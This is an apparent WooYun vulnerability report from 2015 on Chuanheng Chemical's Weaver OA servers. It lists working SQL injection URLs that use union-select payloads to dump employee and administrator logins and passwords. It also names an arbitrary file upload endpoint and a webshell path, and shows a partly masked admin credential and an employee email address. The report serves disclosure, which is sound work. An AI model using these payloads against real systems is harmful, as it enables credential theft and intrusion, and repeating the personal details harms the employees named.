漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0159108
漏洞标题:川恒某系统某系统SQL注入导敏感信息泄露
相关厂商:四川川恒化工股份有限公司
漏洞作者: CapsLk
提交时间:2015-12-08 09:23
修复时间:2015-12-13 09:24
公开时间:2015-12-13 09:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
主站801端口泛微OA
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1
通过编辑添加一行信息后,就可以注入了
直接上手工,全部人员信息
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource
管理员信息
http://www.chanhen.com:801/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourceManager
好多弱口令,登陆OA,大量敏感的文件~~~~~,包括企业的组织架构
sysadmin XXX103 登陆后台,各种敏感信息
2、http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource
http://xd.chanhen.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager
可以从数据库中拿到部分员工的邮箱帐号,密码是md5
wangk@chanhen.com
wkxxxxx 后面隐去
从邮箱中得到大量的工作的敏感信息~~~
3、http://xd.chanhen.com/messager/users.data 这里泄露了各种人员信息
http://www.chanhen.com:801/messager/users.data
4.http://ecis.chanhen.com:89 与xd的OA数据相通,可以直接登陆,里面有手机通信的信息
5、任意文件上传
http://www.chanhen.com:801/tools/SWFUpload/upload.jsp
shell
http://www.chanhen.com:801/nullwoo.jsp 已经发现被入侵痕迹
漏洞证明:
修复方案:
好像有8.0了,升级吧。。
版权声明:转载请注明来源 CapsLk@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-13 09:24
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
2015-12-16:已处理,感谢!